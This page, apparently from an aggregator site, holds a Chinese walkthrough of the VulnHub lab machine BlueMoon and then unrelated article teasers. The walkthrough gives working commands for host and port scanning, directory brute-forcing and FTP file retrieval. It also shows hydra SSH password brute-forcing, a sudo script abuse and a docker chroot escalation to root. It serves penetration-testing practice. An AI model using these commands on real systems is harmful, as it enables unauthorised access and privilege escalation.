当前位置：首页 > news >正文

VulnHub：BlueMoon

news 2025/11/8 20:56:36

准备工作

靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。

信息收集

主机发现

攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

目标靶机ip为：192.168.31.228

端口扫描

nmap 192.168.31.228 -A -p- -T4

目标靶机开放了21，22，80端口。

21端口ftp服务，vsftpd 3.0.3
22端口ssh服务，OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80端口http服务，Apache httpd 2.4.38

web站点信息收集

访问http服务，首页如下：

没什么信息，目录扫描dirsearch -u http://192.168.31.228，没信息，换个字典。

dirsearch -u http://192.168.31.228 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

找到一个隐蔽的目录hidden_text。访问结果如图：

Thank You指向另一个路径，访问得到一个二维码。

扫描内容如下：

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

渗透

FTP登录

根据web信息收集中二维码扫描内容，可知涉及FTP的简单的shell脚本的使用，ftp用户名是userftp，密码是ftpp@ssword，直接登录即可。这里我写的shell脚本，来显示文件列表（纯纯试一下ftp的简单shell脚本如何使用，都给出了用户名和密码直接登录即可，最终目的就是拿到ftp服务器中的两个文件）

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary                          # 设定传输方式为二进制方式
pwd                             # 查看FTP服务器上的当前工作目录
ls                              # 显示文件列表
bye                             # 推出ftp会话
EOF

执行shell脚本得到ftp当前工作目录，和文件列表。

修改一下shell脚本，下载FTP服务器上的文件。

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary  
get information.txt
get p_lists.txt
bye                             
EOF

执行脚本得到一个字典文件p_lists.txt和information.txt，information.txt内容如下：

Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

存在一个用户robin，并给出了密码字典，爆破吧。

ssh爆破

给出了用户名和字典，hydra爆破ssh。

hydra -l robin -P p_lists.txt ssh://192.168.31.228

得到密码：k4rv3ndh4nh4ck3r。

ssh登录过程中有点小问题，提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! ，解决方法如下：

ssh-keygen -R 192.168.31.228

之后正常登录即可。

get user1.txt!

接下来找到了user2.txt，但是仅jerry才有读权。

提权

sudo提权

sudo提权，sudo -l，发现可以通过/home/robin/project/feedback.sh提权到jerry。

feedback.sh当前仅有rx权限，放弃写入反弹shell的方法，直接执行，提示需要输入名字和目标机器。

sudo -u jerry ./feedback.shEnter Your Name:随便填一个
Enter You FeedBack About This Target Machine:/bin/bash

成功切换到jerry，注意到jerry用户加入了docker用户组。

获得一个交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get user2.txt!

docker容器提权

当前jerry用户是普通用户，且加入了docker组。有一个提权方式——普通用户利用docker容器提权。

补充：为什么能利用docker容器提权？因为用户创建一个docker容器后，容器内默认是root账户，会自动在命令前添加sudo。一个普通用户只要加入docker组就等同于root。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功。

get root.txt!🎆

VulnHub：BlueMoon

准备工作靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。信息收集主机发现攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。 nmap 192.168.31.0/24 -Pn -T4 目标靶机ip为：192…...

编程日记 2024/8/16 17:40:54

处理filter里抛出的异常

Filter 的异常是在 org.apache.catalina.core.ApplicationFilterChain.internalDoFilter()这里扔出来的。Filter是tomcat负责调用执行的，所以会比 servlet（尤其是SpringMVC 的dispatcherServlet ）先执行，所以 Filter 里的错误&…...

编程日记 2024/8/16 17:39:53

IndexedDB深度解析：JavaScript的客户端数据库

IndexedDB是一个在用户浏览器中运行的低等级API，用于存储大量结构化数据。作为NoSQL数据库，IndexedDB为Web应用程序提供了丰富的数据存储能力，支持键值对存储、索引、事务和复杂查询等功能。本文将详细介绍IndexedDB的基本概念、工作原理、使…...

编程日记 2024/8/16 17:38:51

C语言中的函数指针和返回值为数组的函数指针对比

函数指针 //定义一个函数指针，函数的参数是int型，返回值为int typedef int （*func)(int);//定义一个函数指针，函数的参数是int*型，返回值为int* typedef int* (*func)(int *);定义一个返回值为数组指针的函数 //定义…...

编程日记 2024/8/16 17:37:50

根据字符串的长度和字符值的大小来对字符串切片进行排序

在 Go 语言中，根据字符串的长度和字符值的大小来对字符串切片进行排序。示例如下: package mainimport ("fmt""sort" )// 自定义类型，以实现排序接口 type byLengthAndValue []string// 实现 sort.Interface 的 Len 方法 func (s b…...

编程日记 2024/8/16 17:35:48

RabbitMQ 的工作原理

下面是rabbitmq 的工作原理图解 1、客户端连接到消息队列服务器，打开一个channel。 2、客户端声明一个exchange，并设置相关属性。 3、客户端声明一个queue，并设置相关属性。 4、客户端使用routing key， 在exchange和queue 之间…...

编程日记 2024/8/16 17:34:46

WPF 资源、引用命名空间格式、FrameworkElement、Binding、数据绑定

资源对象级别独立文件静态资源使用(StaticResource)指的是在程序载入内存时对资源的一次性使用，之后就不再去访问这个资源了。动态资源使用（DynamicResource）使用指的是在程序运行过程中仍然会去访问资源。显然，如果你确定…...

编程日记 2024/8/16 17:32:44

vue3-03-创建响应式数据的几种方法

响应式数据一、 ref 创建：响应式数据1）ref 创建：基本类型的响应式数据2）ref 创建：对象类型的响应式数据3）volar 插件自动添加 .value4）customRef 自定义 ref 二、 reactive 创建：响…...

编程日记 2024/8/16 17:31:43

stm32智能颜色送餐小车（openmv二维码识别+颜色识别+oled显示）

大家好啊，我是情谊，今天我们来介绍一下我最近设计的stm32产品，我们在今年七月份的时候参加了光电设计大赛，我们小队使用的就是stm32的智能送餐小车，虽然止步于省赛，但是还是一次成长的经验吧，那…...

编程日记 2024/8/16 17:28:39

对接的广告平台越多，APP广告变现的收益越高？

无论是游戏、社交、工具应用类APP还是泛娱乐类APP，流量变现的方式主要有广告、内购、订阅三种方式。其中，广告变现是门槛最低、适用最广的变现方式。只要APP有流量，就可以进行广告变现，让APP的流量快速转化为商业价值。作为最常…...

编程日记 2024/8/16 17:25:36

LINUX原始机安装JDK

文章目录下载 JDK压缩包创建jdk文件夹sftp 远程上传解压缩 tar -zxvf 包名配置环境变量刷新环境变量验证是否安装成功安装JAVA 依赖yum更新及替换镜像curl 命令下载更新更新yum依赖判断repo文件是否存在生成缓存、启用阿里云镜像重新下载java依赖再次验证hello world 下载 J…...

编程日记 2024/8/16 17:24:35

MR400D工业级带网口4G DTU：RS232/RS485 TO LTE深度测评

在物联网技术日新月异的今天，数据传输的效率和稳定性成为了各行各业关注的焦点。作为一款集先进性与实用性于一身的物联网设备，工业级带网口的4G DTU（数据传输单元）以其强大的功能特性和广泛的应用场景，赢得了市场的广…...

编程日记 2024/8/16 17:23:33

第四范式发布AI+5G视频营销产品助力精准获客与高效转化

产品上新 Product Release 今天，第四范式AI5G视频电话互动营销产品全新发布。相较于以往销效率低、互动差、转化差的传统电话外呼和短信营销方式，视频电话互动营销基于AI、5G等技术，可让用户接听电话时观看个性化视频广告并实时互动&#xf…...

编程日记 2024/8/16 17:21:31

DVWA-IDS测试（特殊版本）

起因浏览DVWA历史更新记录发现有版本带有IDS插件，可以用于平时没有相关设备等场景演示用，所以开启本次测试。下载官方最新版本是移除了IDS插件，原因是“从不使用”，所以需要下载移除该插件之前的版本。 https://github.com/…...

编程日记 2024/8/16 17:20:30

轻度自闭症的温柔启航：星启帆的康复之旅

在儿童成长的道路上，自闭症作为一种复杂的神经发展障碍，给许多家庭带来了挑战与困扰。轻度自闭症，作为自闭症谱系中的一个类型，其症状表现相对较轻，但同样需要我们的关注与科学的干预。星启帆自闭症儿童康复机构&#…...

编程日记 2024/8/16 17:19:29

一、OpenTK简介

文章目录一、历史和发展二、功能和优势（一）强大的图形渲染功能（二）跨平台支持（三）与 C# 的紧密集成（四）开源和活跃的社区（五）性能优化三、适用场景（一）游戏开发（二）科学计算可视化（三）虚拟现实和增强现实应用（四）图形用户界面开发（五）教育和培训应用（六）…...

编程日记 2024/8/16 17:17:27

Dom4j详细介绍

Dom4j 1.1 解析概览将数据存储为XML格式后，程序化地访问这些数据变得至关重要。虽然Java基础的IO操作能够实现这一目标，但这一过程往往既复杂又繁琐，尤其是在处理大型文件或需要频繁读写操作的场景下。为了解决这些问题，开发者…...

编程日记 2024/8/16 17:16:25

thissuper

this&super 一、 this this关键字表示调用的是当前类的成员变量或者成员方法一般情况下，可以省略this关键字直接调用成员变量以及成员方法但当方法的形参与成员变量同名时，如果要在方法内使用成员变量，必须添加this关键字指明使用的是…...

编程日记 2024/8/16 17:14:22

cv::normalize（）

cv::normalize()函数是OpenCV库中用于对矩阵或图像数据进行归一化处理的工具。归一化是图像处理和计算机视觉中常见的预处理步骤，它可以确保数据在一定范围内，从而有助于后续的处理和算法的稳定性和性能。cv::normalize()函数可以将输入矩阵的值缩放到一…...

编程日记 2024/8/16 17:12:20

【Python快速入门和实践016】Python常用脚本-对视频抽取指定帧数并保存

一、功能介绍这段代码的功能是从一个视频文件中抽取指定数量的帧，并将这些帧保存为图像文件。步骤如下： 设置路径和参数： video_path：视频文件的路径。image_folder：保存抽取图像的目录。num_frames_to_extract&#…...

编程日记 2024/8/16 17:09:17

RestClient

什么是RestClient RestClient 是 Elasticsearch 官方提供的 Java 低级 REST 客户端，它允许HTTP与Elasticsearch 集群通信，而无需处理 JSON 序列化/反序列化等底层细节。它是 Elasticsearch Java API 客户端的基础。 RestClient 主要特点轻量级&#xff…...

编程新知 2025/9/11 12:55:08

Python｜GIF 解析与构建（5）：手搓截屏和帧率控制

目录 Python｜GIF 解析与构建（5）：手搓截屏和帧率控制一、引言二、技术实现：手搓截屏模块 2.1 核心原理 2.2 代码解析：ScreenshotData类 2.2.1 截图函数：capture_screen 三、技术实现&…...

编程新知 2025/9/19 8:02:57

网络六边形受到攻击

大家读完觉得有帮助记得关注和点赞！！！ 抽象现代智能交通系统 （ITS） 的一个关键要求是能够以安全、可靠和匿名的方式从互联车辆和移动设备收集地理参考数据。Nexagon 协议建立在 IETF 定位器/ID 分离协议 （…...

编程新知 2025/11/7 9:56:12

NSURLAuthenticationMethodServerTrust 只是 authenticationMethod 的冰山一角要理解 NSURLAuthenticationMethodServerTrust, 首先要明白它只是 authenticationMethod 的选项之一, 并非唯一 1 先厘清概念点说明authenticationMethodURLAuthenticationChallenge.protectionS…...

编程新知 2025/11/8 7:31:24

12.找到字符串中所有字母异位词

🧠 题目解析题目描述： 给定两个字符串 s 和 p，找出 s 中所有 p 的字母异位词的起始索引。返回的答案以数组形式表示。字母异位词定义： 若两个字符串包含的字符种类和出现次数完全相同，顺序无所谓，则互为…...

编程新知 2025/11/8 9:03:03

涂鸦T5AI手搓语音、emoji、otto机器人从入门到实战

“🤖手搓TuyaAI语音指令 😍秒变表情包大师，让萌系Otto机器人🔥玩出智能新花样！开整！” 🤖 Otto机器人 → 直接点明主体手搓TuyaAI语音 → 强调自主编程/自定义语音控制（TuyaAI…...

编程新知 2025/11/8 9:16:21

是否存在路径（FIFOBB算法）

题目描述一个具有 n 个顶点e条边的无向图，该图顶点的编号依次为0到n-1且不存在顶点与自身相连的边。请使用FIFOBB算法编写程序，确定是否存在从顶点 source到顶点 destination的路径。输入第一行两个整数，分别表示n 和 e 的值（1…...

编程新知 2025/10/1 6:09:21

Mysql8 忘记密码重置，以及问题解决

1.使用免密登录找到配置MySQL文件，我的文件路径是/etc/mysql/my.cnf，有的人的是/etc/mysql/mysql.cnf 在里最后加入 skip-grant-tables重启MySQL服务 service mysql restartShutting down MySQL… SUCCESS! Starting MySQL… SUCCESS! 重启成功 2.登…...

编程新知 2025/9/12 22:46:10